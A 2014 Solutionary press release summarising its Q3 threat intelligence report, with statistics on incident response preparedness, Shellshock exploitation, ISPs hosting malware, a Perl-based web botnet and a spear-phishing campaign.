SOURCE: Solutionary


October 30, 2014 08:00 ET

Amid High-Profile Breaches and Shellshock Disclosure, Solutionary SERT Q3 Threat Intelligence Report Reveals Inadequate Levels of Incident Response Preparedness

67 Percent of Shellshock Signatures Tied to Known Malicious Sources; Top ISPs Continue to Be Used as Malware Hosts

OMAHA, NE--(Marketwired - Oct 30, 2014) - Solutionary, an NTT Group security company (NYSE: NTT), and the next generation managed security services provider (MSSP), today announced the results of its Security Engineering Research Team (SERT) Quarterly Threat Intelligence Report for Q3, 2014. In the latest quarter, Solutionary SERT performed a broad analysis of the threat landscape, including information on the Shellshock and Aftershock vulnerabilities present in Bash. Despite the unprecedented levels of data breaches and mega-breach disclosures in the past year, Solutionary continues to observe inadequate levels of incident response preparedness.

This quarter's report reveals that more than 75 percent of organizations the Solutionary SERT Incident Response Team assisted had neither an incident response team nor policies or procedures in place to effectively address a cyberincident. The Solutionary SERT also tracked the Shellshock disclosure closely and found that 67 percent of the Shellshock signatures were tied to known malicious actors as soon as 24 hours after the vulnerability was disclosed. In addition, as follow-on research to information collected in Q4'13 and Q2'14, the report highlights the top-ten ISPs hosting malware. GoDaddy-hosted sites had a massive resurgence from two percent to 44 percent, reclaiming the number one spot from Amazon Web Services (AWS). Conversely, AWS's fall from 41 percent of hosted malware to 17 percent in Q3 reflects the dramatic and consistent fluctuation in hosting providers being used as attack vectors. 

"Organizations have been inundated with a constant flow of news about data breaches, so the frequency and magnitude of successful attacks actually comes as little surprise. The findings in the Q3 Threat Report highlight not only the challenges security teams are facing but also how little is being done to prepare businesses for these incidents," said Rob Kraus, SERT director of research, Solutionary. "Nearly three quarters of our team's incident response engagements showed minimal, even zero, preparation by IT teams when it came to identifying and remediating security events."

Other Key Topics Include:

Malware Distribution Analysis Updates

  • The United States had a seven percent increase in malware hosting, up to 63 percent, and maintained the number-one rank among malware-hosting countries. New players Spain and Switzerland entered into the top 10, while China experienced a three percent decrease as a host of malware, appearing at number four on the top 10.

Threat Research Focus: Anatomy of a Web-Based Botnet

  • Botnets are increasingly able to enlist multiple device types and platforms, including Windows, Linux, Web servers, workstations and more. Of the 1,900 unique IPs analyzed, as part of a larger Perl-based botnet, a total of 205 Web technologies were identified. 197 of the identified technologies were PHP implementations, encompassing 309 Web-server versions in 73 countries. Additionally, 47 percent of the top-targeted servers were Apache based.

Attacks on UDP Port 40000

  • The quarter has seen a marked increase in connectionless-based User Datagram Protocol (UDP) port probes, especially from UDP Port 40000. This, however, does not discount Transmission Control Protocol (TCP), with 20 percent of the traffic directed at the Remote Desktop Protocol (RDP) originating from Morto Worm activity over TCP Port 6000.

Spear Phishing with VistaTeam

  • SERT researched a spear phishing campaign by a group dubbed "VistaTeam" because of its use of the free Web-hosting trial offered on the Vistaprint website. This attack is designed to evade many standard protection methods and targets companies conducting wire transfers, resulting in hundreds of thousands of dollars in losses.

Readers will find several sections in the report that provide timely, actionable information they can use to help protect against today's most nefarious attack tactics and vectors.

To access a copy of the complete report, please visit:

Tweet This: .@Solutionary Q3 ThreatReport: #IncidentResponse Shows no Progress Despite High-Profile #Breaches & Vuln Disclosures

About Solutionary
Solutionary, an NTT Group security company (NYSE: NTT), is the next generation managed security services provider (MSSP), focused on delivering managed security services, security consulting services and global threat intelligence. Comprehensive Solutionary security monitoring and security device management services protect traditional and virtual IT infrastructures, cloud environments and mobile data. Solutionary clients are able to optimize current security programs, make informed security decisions, achieve regulatory compliance and reduce costs. The patented, cloud-based ActiveGuard® service platform uses multiple detection technologies and advanced analytics to protect against advanced threats. The Solutionary Security Engineering Research Team (SERT) researches the global threat landscape, providing actionable threat intelligence, enhanced threat detection and mitigating controls. Experienced, certified Solutionary security experts act as an extension of clients' internal teams, providing industry-leading client service to global enterprise and mid-market clients in a wide range of industries, including financial services, healthcare, retail and government. Services are delivered 24/7 through multiple state-of-the-art Security Operations Centers (SOCs). 

Contact Information